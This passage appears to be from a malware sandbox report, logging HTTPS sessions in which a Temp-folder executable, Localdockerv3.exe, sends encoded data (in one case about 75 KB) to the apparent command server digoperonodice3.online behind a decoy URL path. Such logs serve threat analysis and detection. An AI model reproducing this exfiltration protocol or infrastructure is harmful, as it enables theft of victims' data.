                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xrhc1Qv4rKZRvcDGAR9QJ5%2FLwMbmmWfp65xNnrmwBqcgkY4IqDyPzersFHnKWhf7DJo8dEF8HHwnnMSbEdoCdJCYjqTxNIUJA%2FLdN9tXiwBEPZ5%2F%2B%2Bza1Pz3qV2xc%2B8pWu%2FVa6rw1eha"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f8785ee8c010f6c-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1667&rtt_var=634&sent=410&recv=712&lost=0&retrans=0&sent_bytes=2855&recv_bytes=684945&delivery_rate=1713615&cwnd=180&unsent_bytes=0&cid=a0b6188009f1f577&ts=2054&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.849717172.67.153.2434431296C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:16:08 UTC484OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      Content-Length: 745
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:16:08 UTC745OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 79 80 76 0f 95 00 00 00 28 00 00 00 04 04 04 04 7d 84 72 0b 07 04 04 04 04 04 04 04 96 c4 94 04 04 04 04 7d 84 72 0b 66 04 04 04 04 04 04 04 54 4f 02 02 28 04 04 04 04 04 04 04 29 04 29 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 54 4f 02 03 04 04 04 04 04 04 04 04 04 04 04 04 05 04 04 04 54 4f 01 02 04 04 04 04 fb fb fb fb fb fb fb fb fb fb fb fb 04 04 fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb a0 1b 48 24 9c ee 94 49 08 00 00 00 f9 8c 55 2b a7 00 00 00 28 00 00 00 04 04 04 04 fd 88 51 2f 11 04 04 04 04 04 04 04 96 c4 96 91 c4 06 05 a7 96 c4 04 a4 91 c4 05 05 a7 96 c4 04 a4 04 04 04 04 fd 88 51 2f 66 04
                                                                                                      Data Ascii: yv(}r}rfTO())TOTOH$IU+(Q/Q/f
                                                                                                      2024-12-27 07:16:09 UTC863INHTTP/1.1 204 No Content
                                                                                                      Date: Fri, 27 Dec 2024 07:16:09 GMT
                                                                                                      Connection: close
                                                                                                      catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XHRxJglVp%2FA5n1H%2FBOoQcZpVu%2FyvKmUDQrESaQeJ5B3JHWU1K9sqlJ0DfKVr3eZ7Rdq%2FHwExpSJ11vWAsm0520gtHSqN7Sn8SaHVN6Wnd21OFXB%2BO3sU3mIrKpURl59190IdJJWmC%2Bsd"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f878604689a0f91-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=54881&min_rtt=1668&rtt_var=32165&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=1865&delivery_rate=1750599&cwnd=218&unsent_bytes=0&cid=cbeb23130d444cb1&ts=805&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.849718172.67.153.2434431296C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:16:10 UTC484OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      Content-Length: 212
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:16:10 UTC212OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 d9 ce f9 3c 99 00 00 00 28 00 00 00 04 04 04 04 dd ca fd 38 03 04 04 04 04 04 04 04 97 c4 c4 96 c4 95 04 04 04 04 04 dd ca fd 38 66 04 04 04 04 04 04 04 54 4f 02 02 28 04 04 04 04 04 04 04 29 04 29 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 54 4f 02 03 04 04 04 04 04 04 04 04 04 04 04 04 05 04 04 04 54 4f 01 02 04 04 04 04 fb fb fb fb fb fb fb fb fb fb fb fb 04 04 fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb a0 1b 48 24 9c ee 94 49 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                      Data Ascii: <(88fTO())TOTOH$I
                                                                                                      2024-12-27 07:16:11 UTC852INHTTP/1.1 204 No Content
                                                                                                      Date: Fri, 27 Dec 2024 07:16:11 GMT
                                                                                                      Connection: close
                                                                                                      catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jAbgIqZEGmUmnO9S8ILqnSueQaPJabZYM2n8qr702%2BuhXCWd1aIwKehrdaqzPGifVmuDDy1rjWj%2B1UGZg8cG9fxewpGrYhrPQVPW7Fbd1tdlhsAmCIMqcyJWFD8XdOj2cz98l1mCsPUd"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f8786117a5c80cd-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1671&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=1332&delivery_rate=1673352&cwnd=178&unsent_bytes=0&cid=456e478332079c78&ts=623&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.849719172.67.153.2434431296C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:16:12 UTC484OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      Content-Length: 380
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:16:12 UTC380OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 02 26 77 35 95 00 00 00 28 00 00 00 04 04 04 04 06 22 73 31 07 04 04 04 04 04 04 04 96 c4 94 04 04 04 04 06 22 73 31 66 04 04 04 04 04 04 04 54 4f 02 02 28 04 04 04 04 04 04 04 29 04 29 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 54 4f 02 03 04 04 04 04 04 04 04 04 04 04 04 04 05 04 04 04 54 4f 01 02 04 04 04 04 fb fb fb fb fb fb fb fb fb fb fb fb 04 04 fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb a0 1b 48 24 9c ee 94 49 08 00 00 00 b2 7c 2b 2e 94 00 00 00 28 00 00 00 04 04 04 04 b6 78 2f 2a 06 04 04 04 04 04 04 04 95 94 04 04 04 04 b6 78 2f 2a 66 04 04 04 04 04 04 04 54 4f 02 02 28 04 04 04 04 04 04 04 29
                                                                                                      Data Ascii: &w5("s1"s1fTO())TOTOH$I|+.(x/*x/*fTO()
                                                                                                      2024-12-27 07:16:13 UTC864INHTTP/1.1 204 No Content
                                                                                                      Date: Fri, 27 Dec 2024 07:16:13 GMT
                                                                                                      Connection: close
                                                                                                      catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ihR3Tzf%2BdAAtANyjrEWl2t2oBBZzs3q3Dg%2BiLC4hkDPV%2FKu2XKD5L8jg3TjqkRcKoh2EhA%2FjsOPcaN%2FpAsE%2FY%2BIHcQvDcho%2B5DmWgO0exhtqJtcTNEunHih7Gke0RSRGjxskLsNzAwxP"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f87861dad1f8c7d-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1807&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1500&delivery_rate=1592148&cwnd=239&unsent_bytes=0&cid=3b16638d5ca579c1&ts=648&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.849720172.67.153.2434431296C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:16:14 UTC483OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      Content-Length: 35
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:16:14 UTC35OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                      Data Ascii:
                                                                                                      2024-12-27 07:16:15 UTC858INHTTP/1.1 204 No Content
                                                                                                      Date: Fri, 27 Dec 2024 07:16:15 GMT
                                                                                                      Connection: close
                                                                                                      catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2Fugh3Brd2rUKhN0Is%2Fa8m94ipTnHFvVjiy9u%2FgOIyDZfTbu3UJmQ6wBz0OfzjphuidvXL%2FErTAcVkmwM2wmXEt9VZyDmc4hsFMMIGVYz3elOuzvsdKRD9bhpIg%2FufmofsS8f6GB2Van"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f8786299d502363-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1812&rtt_var=688&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2857&recv_bytes=1154&delivery_rate=1580942&cwnd=252&unsent_bytes=0&cid=d458431c09926370&ts=614&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.849721172.67.153.2434431296C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:16:17 UTC486OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      Content-Length: 75155
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:16:17 UTC15331OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 66 da 95 30 58 25 01 00 28 00 00 00 04 04 04 04 62 de 91 34 93 0b 04 04 04 04 04 04 9f c4 a2 32 33 31 34 31 36 a2 6c 71 66 61 76 70 97 0e 04 c9 4e 61 95 96 c9 01 04 c9 00 04 cb 04 04 04 05 fb f0 04 04 dd 22 4d 6a 70 61 68 2c 56 2d 24 47 6b 76 61 2c 50 49 2d 36 24 47 54 51 24 32 32 34 34 24 44 24 36 2a 30 34 24 43 4c 7e 95 bb 49 6d 67 76 6b 77 6b 62 70 24 46 65 77 6d 67 24 40 6d 77 74 68 65 7d 24 45 60 65 74 70 61 76 c4 c7 d8 04 cc a4 a2 57 7d 77 70 61 69 ac 56 61 63 6d 77 70 76 7d ac 77 69 77 77 2a 61 7c 61 ad 67 77 76 77 77 2a 61 7c 61 af 73 6d 6a 6d 6a 6d 70 2a 61 7c 61 ad 67 77 76 77 77 2a 61 7c 61 a8 73 6d 6a 68 6b 63 6b 6a 2a 61 7c 61 a8 77 61 76 72 6d 67 61 77 2a 61 7c 61 ad 68 77
                                                                                                      Data Ascii: f0X%(b4231416lqfavpNa"Mjpah,V-$Gkva,PI-6$GTQ$2244$D$6*04$CL~Imgvkwkbp$Fewmg$@mwthe}$E`etpavW}wpaiVacmwpv}wiww*a|agwvww*a|asmjmjmp*a|agwvww*a|asmjhkckj*a|awavrmgaw*a|ahw
                                                                                                      2024-12-27 07:16:17 UTC15331OUTData Raw: 30 d1 06 48 64 60 b4 f2 17 5a 76 66 24 84 24 0c cd d5 89 86 87 c8 11 a5 d4 ea 50 d6 4b 4d 4d 71 54 93 4a 79 46 36 9a 19 d2 6d 80 d4 fd 5c 22 7d 02 ae cc c4 7a 98 e6 3d 15 42 b9 0d a5 55 47 8d 61 6e f5 7c aa c7 50 8f 1c 35 14 b3 a3 1a 18 4e 9a d1 e5 e8 89 c3 ff 2d 9e 98 7e f4 24 7a 1d ee 81 5c 01 17 9d 17 56 80 22 1c 14 a6 2d 19 ec 09 79 10 04 16 85 cf 85 bc 39 74 43 14 d0 88 7f 59 5a 89 28 b8 f1 b5 b1 7f 85 f2 5a b7 82 05 ef 40 23 15 48 17 12 83 30 ba bd 0f 65 d6 e2 f9 1e 5f 8e 4a 67 3b 2b e0 4b 9a 37 d1 5e 89 4c e1 d0 11 2d f1 25 ea a4 c5 dd 67 50 da a2 88 84 d8 2a 52 85 d1 42 8a 91 e9 ca 30 f1 24 49 08 dc b3 dd 42 4b fb b2 e2 30 46 84 cc ae ad 82 72 4e cd 5b cf 15 ee 54 50 13 30 72 2a 3f 07 fd a4 bd 41 70 be 2d 81 43 db c5 46 84 01 c0 6b 98 88 d9 be 6c
                                                                                                      Data Ascii: 0Hd`Zvf$$PKMMqTJyF6m\"}z=BUGan|P5N-~$z\V"-y9tCYZ(Z@#H0e_Jg;+K7^L-%gP*RB0$IBK0FrN[TP0r*?Ap-CFkl
                                                                                                      2024-12-27 07:16:17 UTC15331OUTData Raw: 1b 6f 5f c8 90 d0 5b 79 71 91 29 b4 fc 59 65 9d 64 39 60 58 a5 8f 1e 2b 7b 6f f9 d0 9d 47 56 0f 37 18 a5 d6 6a 9e be d2 ea 26 67 75 cd f2 45 f3 ce 4f 50 ea 16 e3 61 a8 45 7a ff 58 a2 78 cf ca 71 2b d3 a7 f9 87 87 0c 7a 86 6a ab ae 84 7c d7 a0 1b 40 e3 ef ab f4 87 b7 e9 46 c9 fd aa cd 6b 79 d4 53 3b f1 cd 67 a0 4e a5 2b 25 3c 9d 1f 80 f6 bf e6 73 b2 2a 02 7e 71 61 8d 0b 74 1b dd 76 fc ea 8b b2 bd 3c 23 f3 fa 37 01 45 3e f9 58 ec dc 76 ef ef 48 e6 5a 99 ba de 5e 9f e8 80 d5 c4 c2 15 68 9b 96 71 cf bd 13 bd 99 9b 1a b3 5c a7 e5 cf 65 33 32 0e ca 5a ab e6 36 d7 e4 5a 1e ef ca 3e c7 0d bb 5e 59 56 69 d2 b8 f9 3f 8c 49 22 e4 fa 24 e1 c8 a1 a6 49 3e 94 b6 e2 da 92 7b 42 4a b8 eb 81 4b e5 68 ea 0b b1 b2 3f cf b2 ab e7 cf 3b 1b d1 74 eb 5c fa e4 eb f8 b6 5d 44 07
                                                                                                      Data Ascii: o_[yq)Yed9`X+{oGV7j&guEOPaEzXxq+zj|@FkyS;gN+%<s*~qatv<#7E>XvHZ^hq\e32Z6Z>^YVi?I"$I>{BJKh?;t\]D
                                                                                                      2024-12-27 07:16:17 UTC15331OUTData Raw: 48 68 06 42 ff 2e 4f e8 e6 3b f8 de bf 63 d6 75 92 51 b4 ac 75 28 81 4f 57 e6 57 30 4a 68 d7 8e 67 ed 74 d4 07 f3 17 be 83 80 b4 b9 36 c1 02 62 8e eb 93 72 6b f7 8a de ff 0e 59 9e ed 42 49 a9 69 bd d2 2e c9 cc 9c 43 9b 18 ba b8 41 03 3a 8e 70 2d 3b e7 e2 2f f1 4c 95 88 40 23 57 51 72 ef e7 b5 19 f2 89 73 c2 8b 4c b7 76 d7 92 83 2a 8e a2 07 b6 ad b9 6f b6 42 45 f2 73 2d eb bf 98 78 03 0c ed 09 ec fa ce 29 07 ef 6a 43 58 8d f9 9e f7 c3 90 f1 0e 9f 83 55 38 e7 0b bb 98 96 2c 7e 5b 21 3d cf f0 e0 6f 17 c4 40 ef ff 31 f0 4a 1e 75 c3 ff 0e 89 87 98 73 e2 1a 72 37 ef 82 ec 72 dd 32 93 7b a4 25 19 ec 95 da 25 61 3e 3c 34 b6 1a 17 91 75 27 9b 7f 6c 4a 2c 27 3c e2 be 20 0c d1 fb 4b 55 d1 bb f9 4b 1c 65 15 be 87 1d 61 f4 03 f9 47 73 ea 63 29 1c a6 e6 fb 74 9d 1c c6
                                                                                                      Data Ascii: HhB.O;cuQu(OWW0Jhgt6brkYBIi.CA:p-;/L@#WQrsLv*oBEs-x)jCXU8,~[!=o@1Jusr7r2{%%a><4u'lJ,'< KUKeaGsc)t
                                                                                                      2024-12-27 07:16:17 UTC13831OUTData Raw: 95 09 32 80 94 f4 bb 31 12 4d 7c 0c 4f 7b 6d e9 12 ef 11 58 db 3f d8 f2 85 e3 6e dd fc 56 c9 57 9a 56 1f 2c b8 ae c5 21 f7 af 95 d9 14 8d e4 77 4b 8e 58 2f f8 86 81 3e 7b c7 22 02 f6 59 61 81 8a 6c 6b b4 73 52 d1 76 c3 b1 6f 12 00 b3 f9 ae 61 c5 2a b1 fc 19 cd 27 f8 f8 36 f9 fa 8e 69 d1 be 2c e1 7a 88 c8 15 2b 70 d6 8b 71 27 bb e4 20 cf 73 80 08 e3 1f ea 07 db 8b 3b 5f 96 7e 58 66 df 7a 37 6b 42 a5 41 e7 d1 dd 57 2e 14 c0 cd 5c 12 c4 e8 d3 a1 b6 39 b1 e1 19 97 a3 f7 2b 8e 26 17 66 4a fe 52 4e a2 b4 4c 8f 4e 6f ae 59 be e7 9e 62 5e 70 c9 d3 f9 24 26 16 d9 29 33 72 fd a6 e6 c7 bf db 12 c5 97 1d b8 2f d5 78 c3 89 7f 4f ca 6d 1b 76 4f ea 4b 3f e1 ae 88 3c 69 c5 3e a1 8f d2 11 c9 db 81 7a 79 18 bd 24 e2 ef b5 74 cd 5c a2 2d 6b fa bd 89 d9 8b e0 ec 91 b3 94 32
                                                                                                      Data Ascii: 21M|O{mX?nVWV,!wKX/>{"YalksRvoa*'6i,z+pq' s;_~Xfz7kBAW.\9+&fJRNLNoYb^p$&)3r/xOmvOK?<i>zy$t\-k2
                                                                                                      2024-12-27 07:16:18 UTC858INHTTP/1.1 204 No Content
                                                                                                      Date: Fri, 27 Dec 2024 07:16:18 GMT
                                                                                                      Connection: close
                                                                                                      catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AxtTq1Oh33H6nZB5os7uYGtWymPkwyZsGxeRj5O%2BT8LFHU3bTSvnQjHF3JpfDdHF4XM2tGMHxafonRoir7osVB8CMl3hWs6XmJnsuyQU%2FMEM8k%2FPDWXmckfoyU05Gldo4IChzijf2UNP"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f878637f88ac32e-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1624&rtt_var=622&sent=46&recv=79&lost=0&retrans=0&sent_bytes=2856&recv_bytes=76475&delivery_rate=1741204&cwnd=178&unsent_bytes=0&cid=832d3d67d08f0245&ts=1077&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.849722172.67.153.2434431296C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:16:19 UTC483OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      Content-Length: 35
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:16:19 UTC35OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                      Data Ascii:
                                                                                                      2024-12-27 07:16:20 UTC749INHTTP/1.1 204 No Content
                                                                                                      Date: Fri, 27 Dec 2024 07:16:20 GMT
                                                                                                      Connection: close
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RZU%2BZow7yyiRJKbDR6YOuzSrp%2FgoKy7c85qb4S1L2oU2%2Frjf5Zm2Lck%2F%2BGqge4R1hMRTphnVpH%2Fp5lAFHIF3c%2FbBUfxv%2F7mSbMd5302focynHIAEbx6uYIeYixYlHhyyhUJVTyRS2j%2Fz"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f8786481bf64283-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=37291&min_rtt=2109&rtt_var=21754&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1154&delivery_rate=1384542&cwnd=242&unsent_bytes=0&cid=e3c2ebfc36d7d52a&ts=634&x=0"


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.849723172.67.153.2434434080C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:16:23 UTC364OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      Content-Length: 96
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:16:23 UTC96OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 00 00 00 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                      Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                      2024-12-27 07:16:24 UTC734INHTTP/1.1 204 No Content
                                                                                                      Date: Fri, 27 Dec 2024 07:16:24 GMT
                                                                                                      Connection: close
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OcW%2BUBQAkosfmlOhMa0g5MSdwaUegreb1BXRBEbQ4nAO0O5Lsuvu5YUj1YRFTA2F9Lufr9U1ih%2BZaGrHVOtwpd2Wp%2FqYdbC61ZV8TMaODcjSltS3CKf2M1rpfsizBTvG6MnJtxMRLHk5"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f8786617a1542fd-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2373&min_rtt=2366&rtt_var=901&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1096&delivery_rate=1205615&cwnd=248&unsent_bytes=0&cid=619997cc6e7e9f42&ts=710&x=0"


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:02:15:05
                                                                                                      Start date:27/12/2024
